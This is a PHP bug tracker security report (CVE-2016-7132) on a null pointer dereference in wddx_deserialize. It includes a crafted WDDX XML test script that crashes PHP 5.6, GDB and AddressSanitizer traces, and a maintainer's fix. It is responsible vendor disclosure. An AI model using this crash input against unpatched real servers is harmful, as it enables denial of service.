php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72799 wddx_deserialize null dereference in php_wddx_pop_element
Submitted: 2016-08-10 04:29 UTC Modified: 2016-09-05 15:29 UTC
From: fernando at null-life dot com Assigned: stas
Status: Closed Package: WDDX related
PHP Version: 5.6.24 OS: *
Private report: No CVE-ID: 2016-7132
View Add Comment Developer Edit
Anyone can comment on a bug. Have a simpler test case? Does it work for you on a different platform? Let us know!
Just going to say 'Me too!'? Don't clutter the database with that please !
Your email address:
MUST BE VALID
Solve the problem:
35 + 28 = ?
Subscribe to this entry?

 
 [2016-08-10 04:29 UTC] fernando at null-life dot com
Description:
------------
If we add an element to boolean leaf of XML struct, a null pointer dereference will happen when the element is popped. 

Source code:
https://github.com/php/php-src/blob/PHP-5.6.24/ext/wddx/wddx.c#L985

static void php_wddx_pop_element(void *user_data, const XML_Char *name)
{
...
  if (Z_TYPE_P(ent2->data) == IS_ARRAY || Z_TYPE_P(ent2->data) == IS_OBJECT) {
    target_hash = HASH_OF(ent2->data);
...

GDB output
----------

$ gdb -q --args  /home/operac/build2/bin/php -n wdx13bis.php
...
Stopped reason: SIGSEGV
0x00000000015a8f84 in php_wddx_pop_element (user_data=0x7fffffffa200, name=<optimized out>) at /home/operac/build2/php-src-56/ext/wddx/wddx.c:997
997   if (Z_TYPE_P(ent2->data) == IS_ARRAY || Z_TYPE_P(ent2->data) == IS_OBJECT) {
gdb-peda$ bt
#0  0x00000000015a8f84 in php_wddx_pop_element (user_data=0x7fffffffa200, name=<optimized out>) at /home/operac/build2/php-src-56/ext/wddx/wddx.c:997
#1  0x00000000015eca92 in _end_element_handler (user=0x7ffff7f30650, name=<optimized out>) at /home/operac/build2/php-src-56/ext/xml/compat.c:228
...
gdb-peda$ p *ent2
$2 = {
  data = 0x0,                      
  type = ST_BOOLEAN,
  varname = 0x0
}

Test script:
---------------
<?php

$xml = <<<XML
<?xml version='1.0'?>
<!DOCTYPE wddxPacket SYSTEM 'wddx_0100.dtd'>
<wddxPacket version="1.0">
    <var name="XXXX">
        <boolean value="1">
            <dateTime>1998-06-12T04:32:12+00</dateTime>
        </boolean>
    </var>
</wddxPacket>
XML;

$array = wddx_deserialize($xml);


Expected result:
----------------
No crash


Actual result:
--------------
operac@hp2:~/testafl/null$ /home/operac/build2/bin/php -v 
PHP 5.6.26-dev (cli) (built: Aug  7 2016 02:21:28) (DEBUG)
Copyright (c) 1997-2016 The PHP Group
Zend Engine v2.6.0, Copyright (c) 1998-2016 Zend Technologies

operac@hp2:~/testafl/null$ /home/operac/build2/bin/php -n wdx2.php
ASAN:SIGSEGV
=================================================================
==18201==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000014 (pc 0x0000015a8f84 bp 0x7ffc7e2c8dc0 sp 0x7ffc7e2c8c80 T0)
    #0 0x15a8f83 in php_wddx_pop_element /home/operac/build2/php-src-56/ext/wddx/wddx.c:997
    #1 0x15eca91 in _end_element_handler /home/operac/build2/php-src-56/ext/xml/compat.c:228
    #2 0x7f3964cac13c  (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x4a13c)
    #3 0x7f3964cb83bc  (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x563bc)
    #4 0x7f3964cb962a in xmlParseChunk (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x5762a)
    #5 0x15efa8a in php_XML_Parse /home/operac/build2/php-src-56/ext/xml/compat.c:605
    #6 0x15c6f82 in php_wddx_deserialize_ex /home/operac/build2/php-src-56/ext/wddx/wddx.c:1175
    #7 0x15c8037 in zif_wddx_deserialize /home/operac/build2/php-src-56/ext/wddx/wddx.c:1387
    #8 0x1d5bdc3 in zend_do_fcall_common_helper_SPEC /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:558
    #9 0x1c0506c in execute_ex /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:363
    #10 0x194cdb2 in zend_execute_scripts /home/operac/build2/php-src-56/Zend/zend.c:1341
    #11 0x169ad0f in php_execute_script /home/operac/build2/php-src-56/main/main.c:2613
    #12 0x1d64d96 in do_cli /home/operac/build2/php-src-56/sapi/cli/php_cli.c:994
    #13 0x4550a0 in main /home/operac/build2/php-src-56/sapi/cli/php_cli.c:1378
    #14 0x7f3963f4b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #15 0x4556b8 in _start (/home/operac/build2/bin/php+0x4556b8)

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-08-11 06:45 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-08-11 06:45 UTC] stas@php.net
the patch in https://gist.github.com/7e603b8b2c76cd6eed9a33a20a9525d4
 (also a14fdb9746262549bbbb96abb87338bacd147e1b) should fix it.

Please verify.
 [2016-08-11 20:55 UTC] fernando at null-life dot com
Patch works OK. Thanks.

operac@hp2:~/testafl$ /home/operac/build2/bin/php -n 72799.php
NULL
operac@hp2:~/testafl$ cat 72799.php
<?php

$xml = <<<XML
<?xml version='1.0'?>
<!DOCTYPE wddxPacket SYSTEM 'wddx_0100.dtd'>
<wddxPacket version="1.0">
    <var name="XXXX">
        <boolean value="1">
            <dateTime>1998-06-12T04:32:12+00</dateTime>
        </boolean>
    </var>
</wddxPacket>
XML;

$array = wddx_deserialize($xml);

var_dump($array);
 [2016-08-15 06:00 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2016-08-17 06:43 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-08-17 06:43 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2016-09-05 15:29 UTC] remi@php.net
-CVE-ID: needed +CVE-ID: 2016-7132
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sat Jun 24 11:01:36 2017 UTC